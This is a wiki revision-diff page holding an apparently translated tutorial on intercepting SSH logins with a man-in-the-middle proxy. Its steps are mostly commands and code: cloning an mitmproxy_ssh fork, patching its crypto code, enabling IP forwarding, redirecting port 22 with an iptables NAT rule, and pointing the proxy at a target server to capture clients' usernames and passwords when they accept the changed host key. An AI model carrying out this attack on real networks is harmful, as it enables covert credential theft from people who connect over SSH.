Difference between revisions of "MITM: mitm ssh"

From OnnoWiki
Jump to navigation Jump to search
Line 38: Line 38:
  
  
*** setup information
+
==Diagram==
-diagram
+
 
client --> mitmproxy --> ssh server
+
client --> mitmproxy --> ssh server
  
 
- target server ip: 192.168.202.124
 
- target server ip: 192.168.202.124
  
  
1- install dependency packages
+
==Instalasi==
$ sudo pip install twisted
+
 
$ sudo  apt-get install python-service-identity
+
$ sudo pip install twisted
$ pip install pycrypto
+
$ sudo  apt-get install python-service-identity
 +
$ pip install pycrypto
 +
 
 +
 
 +
==Download==
  
2- download the mitmproxy
+
$ git clone https://github.com/saironiq/mitmproxy.git
$ git clone https://github.com/saironiq/mitmproxy.git
 
  
 
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so
 
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so
Line 63: Line 66:
 
$ cd  mitmproxy
 
$ cd  mitmproxy
 
$ sudo ./mitmproxy
 
$ sudo ./mitmproxy
 +
 +
==update firewall==
  
 
5- update ip_forward rule and nat
 
5- update ip_forward rule and nat
$ sudo sysctl -w net.ipv4.ip_forward=1
+
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
+
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  
 
6- run the mitmproxy_ssh and point to target server 192.168.202.124
 
6- run the mitmproxy_ssh and point to target server 192.168.202.124
Line 74: Line 79:
  
 
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124
 
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124
 
 
 
  
 
==Referensi==
 
==Referensi==

Revision as of 07:04, 7 April 2017

sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html


Download

git clone https://github.com/mitmproxy/mitmproxy.git

Generate Keys

./mitmkeys

Ini akan masuk ke ~/.mitmkeys

Instal SSH key yang akan di serang

#Install SSH key
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Jalankan proxy

Then run the proxy, pointing it at the victimserver.

./mitmproxy_ssh -H victimserver

This runs the proxy on localhost:2222

Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.





Diagram

client --> mitmproxy --> ssh server

- target server ip: 192.168.202.124


Instalasi

$ sudo pip install twisted
$ sudo  apt-get install python-service-identity
$ pip install pycrypto


Download

$ git clone https://github.com/saironiq/mitmproxy.git

3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so - modify file mitmproxy/mitmproxy/sshdebug.py

 -- line 655 modify it to below

mpints.append(cnumber.bytes_to_long(

 -- line 11 add the following line

from Crypto.Util import number as cnumber

4- generate keys $ cd mitmproxy $ sudo ./mitmproxy

update firewall

5- update ip_forward rule and nat

$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

6- run the mitmproxy_ssh and point to target server 192.168.202.124 $ sudo ./mitmproxy_ssh -H 192.168.202.124 -s

7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client

- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124

Referensi